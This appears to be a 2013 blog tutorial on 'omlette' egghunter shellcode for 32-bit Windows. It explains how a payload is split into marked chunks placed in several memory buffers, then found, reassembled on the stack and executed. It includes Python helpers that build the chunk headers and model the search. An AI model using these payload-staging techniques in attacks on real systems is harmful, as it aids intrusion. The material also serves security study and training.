Thursday, October 31, 2013

Introduction

When I first heard about omlette egghunter shellcode I was pretty keen to give it a try, but I did not get the opportunity until after I heard that under some unknown circumstances it "doesn't work" (see the note here). At that point I thought I'd have a try at writing some omlette egghunter shellcode myself. About three years then passed before I finally got around to doing it.

Omlette Shellcode

What is it? Omlette shellcode is essentially a variation on egghunter shellcode. As previously discussed on this blog, egghunter shellcode is a small piece of shellcode, suitable for inserting into space-restricted program buffers. Its job is to find, and pass control to, larger sections of shellcode (or "eggs") located in program memory. Traditional egghunter implementations usually expect the "egg" to be inserted into memory in one piece. Omlette shellcode allows you to insert your egg into memory in multiple pieces, and handles the tasks of finding those pieces, sticking them together, and finally passing control to the reconstructed egg. You would use it in exploits where you don't have enough space to place your entire final payload in memory using a single buffer.

It's a bit of a niche thing, and I don't imagine it will be required in too many exploits, but I was interested in having a go at writing an implementation myself.

My Implementation

My implementation uses the syscall method for safely searching Windows memory as documented by Matt Miller, and is based on a modification of his egghunter code from here.

I essentially took his memory searching code, modified parts of it to replace stack operations with direct register operations, and added some extra bits at the start and the end to enable the egg to be reconstructed on the stack and then run.

Caveats

Like Matt Miller's original egghunter, it assumes that the direction flag is unset. This will be the case most of the time, but if not you can add a CLD instruction ("\xfc") to the start to clear it.

The final "egg" is assembled on the stack starting at the ESP register. Make sure you don't have anything you need at that location in memory, because it will be overwritten. Be careful of where the egghunter code itself is located (so you don't overwrite it mid operation) and pivot first if you need to.
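One way to sanity-check this before running an exploit is a simple range-overlap test. The sketch below is only an illustration: it assumes the egg is written upward from ESP, and the helper names and all the addresses and lengths in the usage lines are hypothetical values you would replace with ones read from your debugger.

```python
def ranges_overlap(start_a, len_a, start_b, len_b):
    """True if [start_a, start_a+len_a) and [start_b, start_b+len_b) intersect."""
    return start_a < start_b + len_b and start_b < start_a + len_a


def egg_clobbers_hunter(esp, payload_len, hunter_addr, hunter_len):
    """Assumes the rebuilt egg occupies payload_len bytes starting at esp."""
    return ranges_overlap(esp, payload_len, hunter_addr, hunter_len)


# Hypothetical values: ESP, total payload size, hunter address, hunter size.
if egg_clobbers_hunter(0x0012F000, 384, 0x0012F100, 90):
    print("hunter would be overwritten: pivot the stack first")
```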

The egg chunks need to be located in memory IN ORDER. The egghunter searches memory in ascending order, and it will append the chunks together in the order it finds them until it reaches the final chunk, whereupon it passes control to the reconstructed shellcode. This might limit the exploits you can use it in - memory ordering may not always be something you can control.
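The effect of the ordering requirement can be seen in a rough Python model of the search, run over a flat byte string instead of real process memory. It uses the 10-byte header layout described under Usage. The names `make_chunk` and `reassemble` are hypothetical, and details such as skipping past a chunk's data after copying it are assumptions of the model, not a description of the assembly.

```python
MARKER = b"\x12\x34\x56\x78"  # default marker bytes as they sit in memory
FINAL_FLAG = 0x01             # flag value that marks the last chunk


def make_chunk(data, final=False):
    """Wrap data in the header: marker twice, flag byte, size byte."""
    flag = FINAL_FLAG if final else 0x02
    return MARKER * 2 + bytes([flag, len(data)]) + data


def reassemble(memory):
    """Scan upward and append chunks in the order they are found."""
    tag = MARKER * 2
    out = b""
    pos = 0
    while True:
        pos = memory.find(tag, pos)
        if pos == -1 or pos + 10 > len(memory):
            return None  # the model gives up when it runs out of memory
        flag = memory[pos + 8]
        size = memory[pos + 9]
        start = pos + 10
        out += memory[start:start + size]
        if flag == FINAL_FLAG:
            return out  # the real hunter would now jump to the rebuilt egg
        pos = start + size


a = make_chunk(b"AAAA")
b = make_chunk(b"BBBB")
c = make_chunk(b"CCCC", final=True)

print(reassemble(a + b"\x90" * 7 + b + c))  # b'AAAABBBBCCCC'
print(reassemble(b + a + c))                # b'BBBBAAAACCCC' (wrong order)
print(reassemble(c + a + b))                # b'CCCC' (final chunk found first)
```

In the second and third cases the model still "succeeds", but the rebuilt payload is scrambled or truncated, which is why the chunks have to sit in memory in ascending order.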

I have only tested this on Windows XP SP3. Presumably it will work on other 32-bit Windows versions too; let me know if not and I'll see if I can fix it. It is very unlikely to work for 32-bit apps on 64-bit Windows systems.

Usage

The use of this egghunter is similar to that of Matt Miller's original (click here if you need a reminder of how this works), except that instead of inserting the payload using one buffer, you break it up into multiple chunks first. Each chunk can be any size up to 255 bytes, and the chunks do not need to be the same size as each other. Before getting the chunks into memory you have to add a 10-byte header to each one. The header consists of a 4-byte "marker" value repeated twice, which helps the egghunter find the chunk, followed by a one-byte "final chunk" flag and a one-byte size value. The "final chunk" flag is set to "\x01" for the final egg chunk (chunk n), and to any other value for chunks 1 through n-1.
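The header layout can be sketched in a few lines of Python. This is a minimal illustration, not part of the egghunter itself: `build_header` is a hypothetical helper name, the "\x02" non-final flag is just one possible choice, and rejecting empty chunks is a decision made for the sketch.

```python
MARKER = b"\x12\x34\x56\x78"  # default marker, in the order the bytes sit in memory


def build_header(chunk_len, final=False, marker=MARKER):
    """Return the 10-byte header: marker twice, flag byte, size byte."""
    if len(marker) != 4:
        raise ValueError("marker must be exactly 4 bytes")
    if not 1 <= chunk_len <= 255:
        raise ValueError("chunk size must fit in one byte (1 to 255)")
    flag = 0x01 if final else 0x02  # anything other than 0x01 means "not final"
    return marker * 2 + bytes([flag, chunk_len])


# Chunks do not have to be the same size; only the last one is flagged final.
pieces = [b"A" * 200, b"B" * 17, b"C" * 255]
wrapped = [
    build_header(len(p), final=(i == len(pieces) - 1)) + p
    for i, p in enumerate(pieces)
]
```

Because the size lives in a single byte, anything longer than 255 bytes has to be split into more chunks instead of being given a larger size value.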

Let's consider an example. Assume you have to write an exploit where the initial buffer you can access after gaining control of processor execution is just big enough for this omlette shellcode. However, you can also control the contents of four other memory buffers with about 110 bytes of usable space in each.

First compile the assembly code with nasm and dump the compiled output in hex format to paste into your exploit. You can edit the marker value in the code first if you want to change it. The default value in the assembly above is 0x78563412 which will mean you need to send \x12\x34\x56\x78 as the marker in your exploit (remember: bytes in little endian order). Save the assembly as omlette.asm and do the following:

To use this, you would first add some NOP padding (shikata_ga_nai tends to error out if you don't pad between the start of the code and the stack pointer), and then break it up into four chunks of 96 bytes each, as shown below. Note that the egghunter shellcode doesn't require the chunks to be the same size; that's just the easiest way to do it in this case.

Then prepend a header to each chunk consisting of the marker ("\x12\x34\x56\x78") repeated twice, a single-byte flag value ("\x01" for the final chunk, and anything else for the other chunks; I have used "\x02") and a single-byte size value ("\x60", the hex representation of 96).
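Put together, the padding, splitting and header steps for this example could look something like the following Python sketch. The `payload` here is a hypothetical 341-byte placeholder standing in for the real encoded shellcode, and the variable names are illustrative only. The marker is derived from the value in the assembly to show the little-endian byte order.

```python
import struct

MARKER = struct.pack("<I", 0x78563412)  # b"\x12\x34\x56\x78" in memory order
CHUNK_SIZE = 96
CHUNK_COUNT = 4
BUFFER_SPACE = 110  # usable bytes per buffer in the example scenario

# Placeholder standing in for the real encoded payload (hypothetical contents).
payload = b"\xcc" * 341

# Prepend NOPs so the padded payload fills the four chunks exactly.
padding = CHUNK_SIZE * CHUNK_COUNT - len(payload)
if padding < 0:
    raise ValueError("payload too large for four 96-byte chunks")
padded = b"\x90" * padding + payload

# Split into consecutive 96-byte chunks.
chunks = [padded[i:i + CHUNK_SIZE] for i in range(0, len(padded), CHUNK_SIZE)]

# Prepend the 10-byte header; only the last chunk gets the 0x01 flag.
eggs = []
for index, chunk in enumerate(chunks):
    flag = 0x01 if index == len(chunks) - 1 else 0x02
    eggs.append(MARKER * 2 + bytes([flag, len(chunk)]) + chunk)

# Each egg is 10 + 96 = 106 bytes, which fits the 110-byte buffers.
for egg in eggs:
    assert len(egg) <= BUFFER_SPACE
```

Each entry in `eggs` then goes into one of the four buffers, with the first chunk in the buffer that sits lowest in memory.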

Now you would insert these various sets of bad data into your exploit in the appropriate places, and when the egghunter shellcode is executed, it should be able to find the chunks of the final payload in memory, piece them together on the stack, and then pass control to it when all parts are found.